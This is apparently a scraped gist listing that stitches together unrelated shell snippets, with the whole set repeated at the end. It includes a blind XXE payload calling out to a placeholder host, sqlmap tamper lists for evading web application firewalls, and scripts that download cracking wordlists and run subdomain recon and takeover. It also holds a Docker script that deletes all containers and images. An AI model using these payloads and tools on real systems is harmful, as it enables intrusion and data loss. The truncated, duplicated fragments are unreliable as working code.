Emad Shanab emadshanab

## wordlist.sh
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated  Oct , 2th, 2012
mkdir common
cd common
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2

## doc.mkd

      
              3 files
            
          
              3 forks
            
          
              0 comments
            
          
              4 stars
            
          
                joannecheng
                / doc.mkd
            
            
              Last active
              January 28, 2017 02:01
            
              
                Beyond the Bar Graph: Live coding example
              
          
    Visualizing Rails Issues

Live coding demo from talk at Kod.io @ Linz 2014.


## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## httpie.mailgun.sh
#!/usr/bin/env bash

DOMAIN="example.com"
EMAIL="contact@personalemail.com"

http -a 'api:key-00000000000000000000000000000000' \
    -f POST "https://api.mailgun.net/v3/$DOMAIN/messages" \
    from="Excited User <postmaster@$DOMAIN>" \
    to="$EMAIL" \
    subject="Hello" \

## pigzu.sh
#!/bin/sh

if [ "$1" == "" ]; then
	echo "Usage: $0 <file to uncompress>"
	exit
fi

pigz -dc $1 | tar xf -

## docker.sh
#!/bin/bash
# kill current docker
docker kill $(docker ps -q)
# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)

## ipv4.txt
# 2017-10-01T14:14:44+00:00

108.175.32.0/20
108.175.34.0/24
108.175.35.0/24
192.173.64.0/18
198.38.100.0/24
198.38.101.0/24
198.38.108.0/24
198.38.109.0/24

## wordlists.sh
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated  Oct , 2th, 2012
mkdir common
cd common
wget --no-check-certificate  http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --no-check-certificate  http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --no-check-certificate  http://dl.packetstormsecurity.net/Crackers/wordlists/common-2

## sqlmap tamper scripts
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```

## bountyscan.sh
#!/bin/bash
echo "[*]Basic Aquatone Scan Started [*]"
aquatone-discover -d $1 --threads 10
aquatone-scan -d $1 --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
aquatone-takeover -d $1 --threads 10
echo "[*]sublistr scan for subdomains[*]"
python /root/Sublist3r/sublist3r.py -v -b -d $1 -o $1-subdomains.txt
dos2unix $1-subdomains.txt
echo "Merging found subdomains"
	#!/bin/bash
	#Script by OliverK
	#Downloads _every_ wordlist in the packet storm security site.
	#April 18th, 2011
	# Updated Oct , 2th, 2012
	mkdir common
	cd common
	wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
	wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
	wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/usr/bin/env bash

	DOMAIN="example.com"
	EMAIL="contact@personalemail.com"

	http -a 'api:key-00000000000000000000000000000000' \
	-f POST "https://api.mailgun.net/v3/$DOMAIN/messages" \
	from="Excited User <postmaster@$DOMAIN>" \
	to="$EMAIL" \
	subject="Hello" \
	#!/bin/sh

	if [ "$1" == "" ]; then
	echo "Usage: $0 <file to uncompress>"
	exit
	fi

	pigz -dc $1 \| tar xf -
	#!/bin/bash
	# kill current docker
	docker kill $(docker ps -q)
	# Delete all containers
	docker rm $(docker ps -a -q)
	# Delete all images
	docker rmi $(docker images -q)
	# 2017-10-01T14:14:44+00:00

	108.175.32.0/20
	108.175.34.0/24
	108.175.35.0/24
	192.173.64.0/18
	198.38.100.0/24
	198.38.101.0/24
	198.38.108.0/24
	198.38.109.0/24
	# All scripts
	```
	--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
	```
	# General scripts
	```
	--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
	```
	# Microsoft access
	```
	#!/bin/bash
	echo "[]Basic Aquatone Scan Started []"
	aquatone-discover -d $1 --threads 10
	aquatone-scan -d $1 --ports huge --threads 10
	DEBUG=nightmare xvfb-run -a aquatone-gather -d $1 --threads 10
	aquatone-takeover -d $1 --threads 10
	echo "[]sublistr scan for subdomains[]"
	python /root/Sublist3r/sublist3r.py -v -b -d $1 -o $1-subdomains.txt
	dos2unix $1-subdomains.txt
	echo "Merging found subdomains"